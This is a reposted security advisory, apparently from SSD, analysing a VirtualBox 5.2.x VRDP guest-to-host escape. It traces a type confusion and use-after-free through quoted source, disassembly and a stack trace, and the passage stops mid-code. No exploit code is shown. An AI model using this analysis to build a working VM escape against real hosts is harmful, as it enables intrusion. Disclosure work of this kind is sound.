{"id":13153,"date":"2018-08-20T14:19:06","date_gmt":"2018-08-20T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/08\/20\/news-6920\/"},"modified":"2018-08-20T14:19:06","modified_gmt":"2018-08-20T22:19:06","slug":"news-6920","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/08\/20\/news-6920\/","title":{"rendered":"SSD Advisory \u2013 VirtualBox VRDP Guest-to-Host Escape"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron | Date: Mon, 20 Aug 2018 06:00:52 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> VirtualBox has a built-in RDP server which provides access to a guest machine. While the RDP client sees the guest OS, the RDP server runs on the host OS. Therefore, to view the guest OS, the RDP client connects to the host OS IP address rather than the guest OS IP address.<\/p>\n<p>The VRDP server is composed of two parts: a high-level part, which is open source, resides in the VirtualBox source tree and is responsible for display management, and a low-level part shipped with the Extension Pack, which is the RDP server proper and conforms to the RDP specifications.<\/p>\n<p>The vulnerability is in the high-level part. It can be triggered when a connection to a Windows guest OS is closed, i.e. when the window of an RDP client application such as rdesktop or Microsoft Remote Desktop is closed.<\/p>\n<p>While the crashing bug was reported to the VirtualBox tracker (https:\/\/www.virtualbox.org\/ticket\/16444), it was never considered a security vulnerability and is not marked as one. This ticket is 15 months old at the time of writing this post and is still marked as unresolved.<\/p>\n<p>Prerequisites to exploit the vulnerability:<\/p>\n<ul>\n<li>VirtualBox Extension Pack installed on the host. 
It is required to enable the VRDP server<\/li>\n<li>VRDP server enabled<\/li>\n<li>3D acceleration enabled<\/li>\n<li>Windows 10 as a guest<\/li>\n<\/ul>\n<p>The vulnerability can probably be triggered from other guest OSes as well, since the vulnerable code resides inside the Guest Additions driver.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Sergey\u00a0Zelenyuk, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<br \/> <strong>Affected systems<\/strong><br \/> VirtualBox version 5.2.10<\/p>\n<p><strong>Vendor response<\/strong><br \/> We reported this vulnerability to Oracle; the latest update from them is that they are still looking into it, while in fact the latest version of Oracle VirtualBox, version 5.2.18, has silently introduced a patch without giving credit or mentioning the vulnerability report. We do not know at this time whether this fix was intentional (to fix our report) or done for some other reason; the change log does mention: &#8220;VRDP: fixed VM process termination on RDP client disconnect if 3D is enabled for the virtual machine&#8221;.<\/p>\n<p><b>Vulnerability Analysis<\/b><br \/> <i>General analysis<\/i><br \/> The vulnerability consists of two parts: a type confusion and a use-after-free (UAF). It&#8217;s not clear which of them is a bug and which one was the developer&#8217;s intention. 
We will discuss them separately in the Root Cause Analysis subsection below.<\/p>\n<p>Starting from the end: when the RDP connection is being closed, we gain control at the following place in the \/VirtualBox-5.2.8\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp file, line 1994:<\/p>\n<div id=\"crayon-5b7b3e582f498402605452\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" 
data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">\/* static *\/ DECLCALLBACK(void) ConsoleVRDPServer::H3DORVisibleRegion(void *H3DORInstance, uint32_t cRects, const RTRECT *paRects)\n{\n    H3DORLOG((\"H3DORVisibleRegion: ins %p %d\\n\", H3DORInstance, cRects));\n\n    H3DORInstance *p = (H3DORInstance *)H3DORInstance;\n    Assert(p);\n    Assert(p-&gt;pThis);\n\n    if (cRects == 0)\n    {\n        &#8230;\n    }\n    else\n    {\n        p-&gt;pThis-&gt;m_interfaceImage.VRDEImageRegionSet (p-&gt;hImageBitmap,\n                                                       cRects,\n                                                       paRects);\n    }\n\n    H3DORLOG((\"H3DORVisibleRegion: ins %p completed\\n\", H3DORInstance));\n}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/p><\/div>\n<p>The corresponding assembly is in the VBoxC.so library:<\/p>\n<div id=\"crayon-5b7b3e582f4ab992475133\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">.text:0000000000100DF0 ; void __fastcall ConsoleVRDPServer::H3DORVisibleRegion(void *H3DORInstance, uint32_t cRects, const void *paRects)\n.text:0000000000100DF0 ConsoleVRDPServer__H3DORVisibleRegion proc near\n.text:0000000000100DF0\n.text:0000000000100DF0\n.text:0000000000100DF0 var_10          = dword ptr -10h\n.text:0000000000100DF0 var_C           = dword ptr -0Ch\n.text:0000000000100DF0 var_8           = dword ptr -8\n.text:0000000000100DF0 var_4           = dword ptr -4\n.text:0000000000100DF0\n.text:0000000000100DF0 ; __unwind {\n.text:0000000000100DF0                 push    rbp\n.text:0000000000100DF1                 mov     rax, rdi\n.text:0000000000100DF4                 mov     rbp, rsp\n.text:0000000000100DF7                 sub     rsp, 10h\n.text:0000000000100DFB                 test    esi, esi\n.text:0000000000100DFD                 jz      short loc_100E10\n.text:0000000000100DFF                 mov     rax, [rax]\n.text:0000000000100E02                 mov     rdi, [rdi+8]\n.text:0000000000100E06                 call    qword ptr [rax+320h]\n.text:0000000000100E0C                 leave\n.text:0000000000100E0D                 retn<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/p><\/div>\n<p><b>Root Cause Analysis<\/b><br \/> Stopping at ConsoleVRDPServer::H3DORVisibleRegion we get the following stack trace (here we use binaries with symbols compiled by us rather than those downloaded from the VirtualBox website):<\/p>\n<div id=\"crayon-5b7b3e582f4b3589652091\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #0  ConsoleVRDPServer::H3DORVisibleRegion (H3DORInstance=0x7f7db9817190, cRects=0x1, paRects=0x7f7db9ccad20) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp:1996  #1  0x00007f7dcc1f0298 in CrFbDisplayVrdp::vrdpRegions (this=0x7f7db91fdf90, pFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, hEntry=0x7f7dcd079dc0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_vrdp.cpp:255  #2  0x00007f7dcc1efddd in CrFbDisplayVrdp::EntryRemoved (this=0x7f7db91fdf90, pFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, hEntry=0x7f7dcd079dc0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_vrdp.cpp:116  #3  0x00007f7dcc1f4e40 in CrFbDisplayBase::fbCleanupRemoveAllEntries (this=0x7f7db91fdf90) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp:323  #4  0x00007f7dcc1f0024 in CrFbDisplayVrdp::fbCleanup (this=0x7f7db91fdf90) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_vrdp.cpp:193  #5  0x00007f7dcc1f4808 in CrFbDisplayBase::setFramebuffer (this=0x7f7db91fdf90, pFb=0x0) at 
\/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp:97  #6  0x00007f7dcc1f3ab1 in CrFbDisplayComposite::remove (this=0x7f7db92702b0, pDisplay=0x7f7db91fdf90, fCleanupDisplay=0x1) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_composite.cpp:67  #7  0x00007f7dcc1cf823 in crPMgrFbDisconnectDisplay (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, pDp=0x7f7db91fdf90) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2008  #8  0x00007f7dcc1d02cf in crPMgrFbDisconnectTargetDisplays (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, pDpInfo=0x7f7dcc5163f0 &lt;g_CrPresenter+48&gt;, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2226  #9  0x00007f7dcc1d0787 in crPMgrModeModifyTarget (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, iDisplay=0x0, u32ModeAdd=0x0, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2370  #10 0x00007f7dcc1d088f in crPMgrModeModify (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, u32ModeAdd=0x0, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2396  #11 0x00007f7dcc1d0c81 in crPMgrModeModifyGlobal (u32ModeAdd=0x0, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2495  #12 0x00007f7dcc1d0d69 in CrPMgrModeVrdp (fEnable=0x0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2536  #13 0x00007f7dcc1e1bc8 in crVBoxServerSetOffscreenRendering (value=0x0) at 
\/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/server_main.c:2734  #14 0x00007f7dcc1c9aca in svcHostCallPerform (u32Function=0x14, cParms=0x1, paParms=0x7f7df00fcb30) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserver\/crservice.cpp:1338  #15 0x00007f7dcc1ca071 in crVBoxServerHostCtl (pCtl=0x7f7df00fcb10, cbCtl=0x38) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserver\/crservice.cpp:1438  #16 0x00007f7dcc1e2bc7 in crVBoxCrCmdHostCtl (hSvr=0x0, pCmd=0x7f7df00fcb10 &quot;\u000001&quot;, cbCmd=0x38) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/server_main.c:3218  #17 0x00007f7db756add6 in vboxVDMACrHostCtlProcess (pVdma=0x555786209b10, pCmd=0x7f7dcd054f80, pfContinue=0x7f7df06ade17) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Devices\/Graphics\/DevVGA_VDMA.cpp:1376  #18 0x00007f7db756e391 in vboxVDMAWorkerThread (hThreadSelf=0x55578563bde0, pvUser=0x555786209b10) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Devices\/Graphics\/DevVGA_VDMA.cpp:2696  #19 0x00007f7e1481bb87 in rtThreadMain (pThread=0x55578563bde0, NativeThread=0x7f7df06ae700, pszThreadName=0x55578563c6c0 &quot;VDMA&quot;) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Runtime\/common\/misc\/thread.cpp:719  #20 0x00007f7e148e36af in rtThreadNativeMain (pvArgs=0x55578563bde0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Runtime\/r3\/posix\/thread-posix.cpp:327  #21 0x00007f7e10075494 in start_thread (arg=0x7f7df06ae700) at pthread_create.c:333  #22 0x00007f7e1222671f in clone () at ..\/sysdeps\/unix\/sysv\/linux\/x86_64\/clone.S:105<\/textarea><\/div>\n
<\/div>\n
<p>Frames #22 &#8211; #14 are a generic handler of VDMA requests, including calls to the Shared OpenGL Service (Chromium Service) from a guest or a host. Frames #13 &#8211; #9 prepare for the creation or closing of displays that follows. (A display is a part of the screen sent to a client. There may be several displays: one may represent the entire screen and another may be a small rectangle carrying an update for the screen.) At frames #8 &#8211; #7 we reach the point where the type confusion occurs.<\/p>\n
<p><b>Type Confusion<\/b><br \/> Frame #7 is in the following function, crPMgrFbDisconnectDisplay:<\/p>\n
<pre><code>static int crPMgrFbDisconnectDisplay(HCR_FRAMEBUFFER hFb, CrFbDisplayBase *pDp)\n
{\n
    ...\n
\n
    if (pDp-&gt;getContainer() == pFbInfo-&gt;pDpComposite)\n
    {\n
        pFbInfo-&gt;pDpComposite-&gt;remove(pDp);\n
        ...\n
        return VINF_SUCCESS;\n
    }\n
\n
    WARN((&quot;misconfig&quot;));\n
    return VERR_INTERNAL_ERROR;\n
}<\/code><\/pre>\n
<p>The second argument is a pointer to an object of the CrFbDisplayBase class. This class has the following subclasses: CrFbDisplayComposite, CrFbDisplayWindow, CrFbDisplayWindowRootVr and CrFbDisplayVrdp. In our case the dynamic type of the pDp object is not CrFbDisplayBase but CrFbDisplayVrdp, so its virtual table pointer references the CrFbDisplayVrdp table. Keep this in mind.<\/p>\n
<p>When pDp-&gt;getContainer() is called, the call goes to the base class&#8217;s getContainer method, because only CrFbDisplayBase implements it. The return value of this method is an object of type CrFbDisplayComposite. This is strange, because in our case the object is actually of type CrFbDisplayVrdp.<\/p>\n
<p>This allows the check to pass and CrFbDisplayComposite::remove() to be called (frame #6). 
This method calls CrFbDisplayBase::setFramebuffer, which has another interesting line:<\/p>\n
<pre><code>int CrFbDisplayBase::setFramebuffer(struct CR_FRAMEBUFFER *pFb)\n
{\n
    ...\n
\n
    if (mpFb)\n
    {\n
        rc = fbCleanup();\n
    ...\n
}<\/code><\/pre>\n
<p>We can assume that the code was written with the intention of calling fbCleanup() on an object of type CrFbDisplayBase, but the actual object type is CrFbDisplayVrdp (remember the virtual table pointer). 
Hence, instead of calling CrFbDisplayBase::fbCleanup(), we call CrFbDisplayVrdp::fbCleanup().<\/p>\n
<p><b>Use-After-Free<\/b><br \/> CrFbDisplayVrdp::fbCleanup() calls the method fbCleanupRemoveAllEntries(), which is implemented only in the base class, so we arrive at CrFbDisplayBase::fbCleanupRemoveAllEntries(), which is the root of the UAF and of the entire vulnerability.<\/p>\n
<pre><code>int CrFbDisplayBase::fbCleanupRemoveAllEntries()\n
{\n
    VBOXVR_SCR_COMPOSITOR_CONST_ITERATOR Iter;\n
    const VBOXVR_SCR_COMPOSITOR_ENTRY *pEntry;\n
\n
    CrVrScrCompositorConstIterInit(CrFbGetCompositor(mpFb), &amp;Iter);\n
\n
    int rc = VINF_SUCCESS;\n
\n
    while ((pEntry = CrVrScrCompositorConstIterNext(&amp;Iter)) != NULL)\n
    {\n
        HCR_FRAMEBUFFER_ENTRY hEntry = CrFbEntryFromCompositorEntry(pEntry);\n
        rc = EntryRemoved(mpFb, hEntry);\n
        if (!RT_SUCCESS(rc))\n
        {\n
            WARN((&quot;err&quot;));\n
            break;\n
        }\n
\n
        CrFbVisitCreatedEntries(mpFb, entriesDestroyCb, this);\n
    }\n
\n
    return rc;\n
}<\/code><\/pre>\n
<p>The loop iterates through all displays and calls EntryRemoved() for each of them; HCR_FRAMEBUFFER_ENTRY is a pointer to a structure that represents a single display. Again, EntryRemoved() is called through the CrFbDisplayVrdp virtual table rather than the CrFbDisplayBase one. 
Skipping an analysis of how the deletion is performed, let&#8217;s analyze what happens when CrFbVisitCreatedEntries is called.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4e5735068250\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px 
!important;\"> void CrFbVisitCreatedEntries(HCR_FRAMEBUFFER hFb, PFNCR_FRAMEBUFFER_ENTRIES_VISITOR_CB pfnVisitorCb, void *pvContext)  {      HCR_FRAMEBUFFER_ENTRY hEntry, hNext;      RTListForEachSafe(&amp;hFb-&gt;EntriesList, hEntry, hNext, CR_FRAMEBUFFER_ENTRY, Node)      {          if (hEntry-&gt;Flags.fCreateNotified)          {              if (!pfnVisitorCb(hFb, hEntry, pvContext))                  return;          }      }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; 
-webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-1\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CrFbVisitCreatedEntries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HCR_FRAMEBUFFER <\/span><span class=\"crayon-v\">hFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PFNCR_FRAMEBUFFER_ENTRIES_VISITOR_CB <\/span><span class=\"crayon-v\">pfnVisitorCb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">pvContext<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">HCR_FRAMEBUFFER_ENTRY <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hNext<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">RTListForEachSafe<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">hFb<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">EntriesList<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hNext<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">CR_FRAMEBUFFER_ENTRY<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Node<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">Flags<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">fCreateNotified<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">pfnVisitorCb<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pvContext<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-9\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-12\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>The first argument is the container of all displays, the second is a callback called for each display, and the third is an argument for the callback. This procedure iterates through all the displays and calls the callback. 
Now look at the callback itself.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4ee095432337\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> DECLCALLBACK(bool) CrFbDisplayBase::entriesDestroyCb(HCR_FRAMEBUFFER hFb, 
HCR_FRAMEBUFFER_ENTRY hEntry, void *pvContext)  {      int rc = ((ICrFbDisplay*)(pvContext))-&gt;EntryDestroyed(hFb, hEntry);      if (!RT_SUCCESS(rc))      {          WARN((&quot;err&quot;));      }      return true;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ee095432337-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ee095432337-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ee095432337-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ee095432337-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ee095432337-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" 